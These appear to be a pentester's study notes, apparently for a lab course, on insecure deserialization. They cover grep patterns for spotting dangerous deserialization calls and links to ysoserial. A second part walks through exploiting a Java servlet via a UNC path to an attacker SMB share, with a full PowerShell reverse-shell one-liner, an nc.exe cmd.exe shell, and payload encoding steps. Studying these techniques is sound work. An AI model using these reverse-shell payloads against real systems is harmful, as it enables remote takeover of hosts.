Background
- The purpose is to convert a data structure into a format that can be stored or transmitted over a network link for future consumption.
- In other words, Serialization is the process of converting an object into a form that can be readily transported. For example, you can serialize an object and transport it over the Internet using HTTP between a client and a server. On the other end, deserialization reconstructs the object from the stream.
-
Phar Deserialization: https://tantosec.com/blog/cve-2022-41343/
Grep
grep -riE '(marshal|pickle)\.(loads|dumps)[[:space:]]*\(' .
grep -ri 'yaml.load' .
grep -r 'new ObjectInputStream' .
grep -rE '\.read(Object|External|Resolve)[[:space:]]*\(' .
grep -riE 'deserialize\<[^\>]+\>[[:space:]]*\(' .
grep -rE 'unserialize[[:space:]]*\(.*\$' .
.NET (C#)
BinaryFormatter class
XmlSerializer class (serialize public properties and fields of objects only)
https://github.com/pwntester/ysoserial.net
Java
Search for:
+ readObject
+ Serializable
Resources
- https://github.com/frohoff/ysoserial
- https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#java-native-serialization-binary
- https://www.baeldung.com/java-deserialization-vulnerabilities
-
Serializable interface is required
Exploitation (Java)
- Search code base for readObject or Serializable (e.g.
java.util.HashMap today = (java.util.HashMap)ois.readObject();)
- Find request location:
POST /servlet/CustomFieldsFeedServlet?customFieldObject=\\\\192.168.119.135\\AWAE\\exploit HTTP/1.1
Host: 192.168.135.113:8443
Cookie: JSESSIONID_APM_9090=DD2EA485CD9594E5E6013D1DC3123987; testcookie=; am_username=; am_check=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Length: 0
- CustomFieldObject can accept a filename:
fileName = request.getParameter("customFieldObject");
- In Windows, we can accept a UNC path, such as pointing to a remote SMB share.
- Create a share -
python3 /usr/share/doc/python3-impacket/examples/smbserver.py awae ~/AWAE/Share
- Use cmd.exe + nc.exe OR powershell.exe payload:
$client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
cmd.exe /c \\\\192.168.119.135\\awae\\nc.exe 192.168.119.135 9000 -e cmd.exe (Use binary `cp /usr/share/windows-binaries/nc.exe`)
- Encode the payload, otherwise may run into issues receiving the reverse shell
iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
powershell -EncodedCommand [result_for_iconv]
